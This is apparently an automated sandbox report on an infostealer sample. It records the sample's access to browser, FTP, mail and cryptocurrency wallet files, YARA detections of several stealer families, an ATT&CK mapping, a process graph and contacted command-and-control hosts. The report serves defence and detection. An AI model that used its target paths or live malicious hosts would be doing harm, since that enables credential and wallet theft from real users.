                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Tries to harvest and steal ftp login credentials
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                            Tries to steal Crypto Currency Wallets
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                            Tries to steal Mail credentials (via file / registry access)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeDirectory queried: number of queries: 1001
                            Source: Yara matchFile source: 00000023.00000002.2984201099.0000000000582000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5316, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6208, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 340, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected LummaC Stealer
                            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                            Yara detected PrivateLoader
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 364, type: MEMORYSTR
                            Yara detected Stealc
                            Source: Yara matchFile source: 13.2.ZNiWLZA4sT3dAjz_lF65fVs6.exe.4115570.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.ZNiWLZA4sT3dAjz_lF65fVs6.exe.4115570.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000013.00000002.2779012779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.2783474686.000000000147A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.2333416997.0000000004115000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Yara detected Vidar
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Yara detected Vidar stealer
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 35.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.E4aR4O9hOTF5WJfvKNpcVCp8.exe.38e5570.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.E4aR4O9hOTF5WJfvKNpcVCp8.exe.38e5570.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 35.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.2354142791.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: E4aR4O9hOTF5WJfvKNpcVCp8.exe PID: 6812, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5316, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6208, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 340, type: MEMORYSTR
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC30B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,19_2_6BC30B40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB58EA0 sqlite3_clear_bindings,19_2_6BB58EA0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC30D60 sqlite3_bind_parameter_name,19_2_6BC30D60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC30C40 sqlite3_bind_zeroblob,19_2_6BC30C40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB563C0 PR_Bind,19_2_6BB563C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BAE22D0 sqlite3_bind_blob,19_2_6BAE22D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB560B0 listen,WSAGetLastError,19_2_6BB560B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB5C030 sqlite3_bind_parameter_count,19_2_6BB5C030
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB56070 PR_Listen,19_2_6BB56070
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB5C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,19_2_6BB5C050
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB56410 bind,WSAGetLastError,19_2_6BB56410

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		2
                            OS Credential Dumping                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		12
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts31
                            Native API                            		121
                            Registry Run Keys / Startup Folder                            		511
                            Process Injection                            		11
                            Deobfuscate/Decode Files or Information                            		1
                            Credentials in Registry                            		1
                            Account Discovery                            		Remote Desktop Protocol4
                            Data from Local System                            		21
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            PowerShell                            		Logon Script (Windows)121
                            Registry Run Keys / Startup Folder                            		3
                            Obfuscated Files or Information                            		Security Account Manager13
                            File and Directory Discovery                            		SMB/Windows Admin Shares1
                            Screen Capture                            		3
                            Non-Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook13
                            Software Packing                            		NTDS147
                            System Information Discovery                            		Distributed Component Object Model1
                            Email Collection                            		124
                            Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets1
                            Query Registry                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Masquerading                            		Cached Domain Credentials461
                            Security Software Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items241
                            Virtualization/Sandbox Evasion                            		DCSync241
                            Virtualization/Sandbox Evasion                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                            Process Injection                            		Proc Filesystem12
                            Process Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                            Application Window Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                            System Owner/User Discovery                            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                            System Network Configuration Discovery                            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524021 Sample: file.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 144 treatynreit.site 2->144 146 steamcommunity.com 2->146 148 15 other IPs or domains 2->148 186 Suricata IDS alerts for network traffic 2->186 188 Found malware configuration 2->188 190 Antivirus detection for URL or domain 2->190 192 20 other signatures 2->192 15 file.exe 1 6 2->15         started        19 LKMService.exe 2->19         started        21 GoogleUpdater.exe 2->21         started        23 2 other processes 2->23 signatures3 process4 dnsIp5 126 C:\Users\user\AppData\...\LKMService.exe, PE32 15->126 dropped 128 C:\Users\...\LKMService.exe:Zone.Identifier, ASCII 15->128 dropped 130 C:\Users\user\AppData\Local\...\file.exe.log, CSV 15->130 dropped 166 Detected unpacking (changes PE section rights) 15->166 168 Creates multiple autostart registry keys 15->168 26 LKMService.exe 16 42 15->26         started        31 WerFault.exe 19->31         started        33 WerFault.exe 21->33         started        152 104.26.13.205 CLOUDFLARENETUS United States 23->152 35 WerFault.exe 23->35         started        file6 signatures7 process8 dnsIp9 154 147.45.44.104, 49711, 49725, 49726 FREE-NET-ASFREEnetEU Russian Federation 26->154 156 api.ipify.org 104.26.12.205, 49708, 80 CLOUDFLARENETUS United States 26->156 158 yalubluseks.eu 172.67.140.92, 443, 49709, 49710 CLOUDFLARENETUS United States 26->158 114 C:\...\f98ae5e6665140c7bc7a10ef5c598fcb.exe, PE32 26->114 dropped 116 C:\Users\user\AppData\...behaviorgraphoogleUpdater.exe, PE32 26->116 dropped 220 Multi AV Scanner detection for dropped file 26->220 222 Creates multiple autostart registry keys 26->222 224 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 26->224 37 f98ae5e6665140c7bc7a10ef5c598fcb.exe 2 26->37         started        40 GoogleUpdater.exe 26->40         started        file10 signatures11 process12 signatures13 194 Multi AV Scanner detection for dropped file 37->194 196 Contains functionality to inject code into remote processes 37->196 198 Writes to foreign memory regions 37->198 200 2 other signatures 37->200 42 RegAsm.exe 17 37->42         started        47 conhost.exe 37->47         started        process14 dnsIp15 160 api64.ipify.org 173.231.16.77, 443, 49715 WEBNXUS United States 42->160 162 ipinfo.io 34.117.59.81, 443, 49716 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 42->162 164 2 other IPs or domains 42->164 118 C:\Users\...\ZNiWLZA4sT3dAjz_lF65fVs6.exe, PE32 42->118 dropped 120 C:\Users\...4aR4O9hOTF5WJfvKNpcVCp8.exe, PE32 42->120 dropped 122 C:\Users\...\66fbfccd837ac_vadggdsa[1].exe, PE32 42->122 dropped 124 C:\Users\user\...\66fbfcc301a31_swws[1].exe, PE32 42->124 dropped 226 Drops PE files to the document folder of the user 42->226 228 Found many strings related to Crypto-Wallets (likely being stolen) 42->228 230 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 42->230 232 3 other signatures 42->232 49 ZNiWLZA4sT3dAjz_lF65fVs6.exe 42->49         started        52 E4aR4O9hOTF5WJfvKNpcVCp8.exe 42->52         started        file16 signatures17 process18 signatures19 170 Multi AV Scanner detection for dropped file 49->170 172 Writes to foreign memory regions 49->172 174 Allocates memory in foreign processes 49->174 54 RegAsm.exe 49->54         started        59 conhost.exe 49->59         started        61 RegAsm.exe 49->61         started        176 Injects a PE file into a foreign processes 52->176 63 conhost.exe 52->63         started        65 RegAsm.exe 52->65         started        process20 dnsIp21 150 46.8.231.109, 58515, 80 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 54->150 106 C:\Users\user\AppData\...\softokn3[1].dll, PE32 54->106 dropped 108 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 54->108 dropped 110 C:\Users\user\AppData\...\mozglue[1].dll, PE32 54->110 dropped 112 12 other files (8 malicious) 54->112 dropped 212 Tries to steal Mail credentials (via file / registry access) 54->212 214 Tries to harvest and steal browser information (history, passwords, etc) 54->214 216 Tries to steal Crypto Currency Wallets 54->216 218 Tries to harvest and steal Bitcoin Wallet information 54->218 67 cmd.exe 54->67         started        69 cmd.exe 54->69         started        file22 signatures23 process24 process25 71 userCGHCGIIDGD.exe 67->71         started        74 conhost.exe 67->74         started        76 userJEHDHIEGII.exe 69->76         started        78 conhost.exe 69->78         started        signatures26 202 Multi AV Scanner detection for dropped file 71->202 204 Writes to foreign memory regions 71->204 206 Allocates memory in foreign processes 71->206 80 RegAsm.exe 71->80         started        85 conhost.exe 71->85         started        208 Injects a PE file into a foreign processes 76->208 210 LummaC encrypted strings found 76->210 87 RegAsm.exe 76->87         started        89 conhost.exe 76->89         started        91 RegAsm.exe 76->91         started        93 2 other processes 76->93 process27 dnsIp28 132 cowod.hopto.org 45.132.206.251 LIFELINK-ASRU Russian Federation 80->132 134 49.12.197.9 HETZNER-ASDE Germany 80->134 136 steamcommunity.com 104.102.49.254 AKAMAI-ASUS United States 80->136 98 C:\Users\user\...\66fbfcc9963ca_ldfsna[1].exe, PE32 80->98 dropped 100 C:\ProgramData\JJJEGCGDGH.exe, PE32 80->100 dropped 102 C:\ProgramData\FIEHIIIJDA.exe, PE32 80->102 dropped 104 C:\ProgramDataBAEBFIIEC.exe, PE32 80->104 dropped 178 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 80->178 180 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 80->180 182 Tries to harvest and steal ftp login credentials 80->182 184 3 other signatures 80->184 95 FIEHIIIJDA.exe 80->95         started        138 gravvitywio.store 104.21.16.12 CLOUDFLARENETUS United States 87->138 140 absorptioniw.site 104.21.17.174 CLOUDFLARENETUS United States 87->140 142 6 other IPs or domains 87->142 file29 signatures30 process31 signatures32 234 Multi AV Scanner detection for dropped file 95->234 236 Writes to foreign memory regions 95->236 238 Allocates memory in foreign processes 95->238 240 Injects a PE file into a foreign processes 95->240

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            file.exe37%ReversingLabsWin32.Trojan.Generic
                            file.exe100%AviraTR/Dropper.MSIL.Gen
                            file.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\EBAEBFIIEC.exe55%ReversingLabsByteCode-MSIL.Trojan.RedlineStealer
                            C:\ProgramData\FIEHIIIJDA.exe61%ReversingLabsWin32.Trojan.RedlineStealer
                            C:\ProgramData\JJJEGCGDGH.exe61%ReversingLabsWin32.Trojan.RedlineStealer
                            C:\ProgramData\freebl3.dll0%ReversingLabs
                            C:\ProgramData\mozglue.dll0%ReversingLabs
                            C:\ProgramData\msvcp140.dll0%ReversingLabs
                            C:\ProgramData\nss3.dll0%ReversingLabs
                            C:\ProgramData\softokn3.dll0%ReversingLabs
                            C:\ProgramData\vcruntime140.dll0%ReversingLabs
                            C:\Users\userCGHCGIIDGD.exe61%ReversingLabsWin32.Trojan.RedlineStealer
                            C:\Users\userJEHDHIEGII.exe61%ReversingLabsWin32.Trojan.RedlineStealer
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66fbfcc9963ca_ldfsna[1].exe61%ReversingLabsWin32.Trojan.RedlineStealer
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fbfcc301a31_swws[1].exe55%ReversingLabsByteCode-MSIL.Trojan.RedlineStealer
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fbfccd837ac_vadggdsa[1].exe61%ReversingLabsWin32.Trojan.RedlineStealer
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66fbfcc9963ca_ldfsna[1].exe61%ReversingLabsWin32.Trojan.RedlineStealer
                            C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe37%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe37%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe62%ReversingLabsWin32.Trojan.Privateloader
                            C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exe61%ReversingLabsWin32.Trojan.RedlineStealer
                            C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exe55%ReversingLabsByteCode-MSIL.Trojan.RedlineStealer

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                            https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f0%URL Reputationsafe
                            https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                            http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                            http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll100%URL Reputationmalware
                            https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
